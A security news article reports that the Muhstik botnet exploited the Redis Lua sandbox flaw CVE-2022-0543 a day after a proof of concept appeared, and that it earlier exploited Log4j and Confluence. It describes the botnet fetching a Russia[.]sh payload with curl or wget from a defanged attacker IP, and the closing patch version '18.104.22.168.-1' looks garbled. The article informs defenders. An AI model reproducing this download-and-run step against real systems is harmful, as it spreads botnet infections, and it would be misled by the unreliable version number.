The Muhstik botnet gang was quick on their feet after immediately using researchers’ proof-of-concept exploit about the Lua sandbox critical flaw. Researchers released the PoC on March 10 then the botnet group has utilized it for distributed denial-of-service operations the next day.
Based on the reports, the threat actors targeted critical vulnerabilities called Redis Debian packages or CVE-2022-0543, which impact two operating systems, Debian and Ubuntu Linux distributions.
The attack process includes an attempt to download the primary payload dubbed Russia[.]sh by utilizing curl or wget from the threat actor-controlled IP address (106[.]246[.]224[.]219).
The researchers also noticed that the threat actors saved the script as /tmp/russ to download and operate Linux binaries identified as strains of the Muhstik botnet.
If a user installs it, the botnet will connect to an Internet Relay Chat server to receive commands, including executing shell instructions, downloading files, carrying out flood attacks, and brute-forcing SSH campaigns.
The Muhstik botnet gang still used their previous IP address to test out the proof-of-concept provided by the researchers.
The researchers were able to trace and identify the threat actors since the originating IP addresses of the threat campaigns on the Redis servers are identical to the previous attacks conducted by Muhstik.
The IP address used by the Muhstik back then was tracked by the researchers as 191[.]232[.]38[.]25, which they also used in their latest campaign in December 2021. The threat actors launched an attack by abusing the Apache Log4j critical vulnerability (CVE-2021-44228).
The Muhstik botnet had also targeted the Confluence Servers by exploiting the CVE-2021-26084 flaw in September when they used an identical IP address and had started abusing the recent vulnerability in the shortest period possible.
Experts claimed that more hackers would exploit the recently discovered flaw; thus, users should update their packages to Redis package version 18.104.22.168.-1 or follow Ubuntu’s security bulletin or the Debian security advisory on the issue to stay protected against this attack.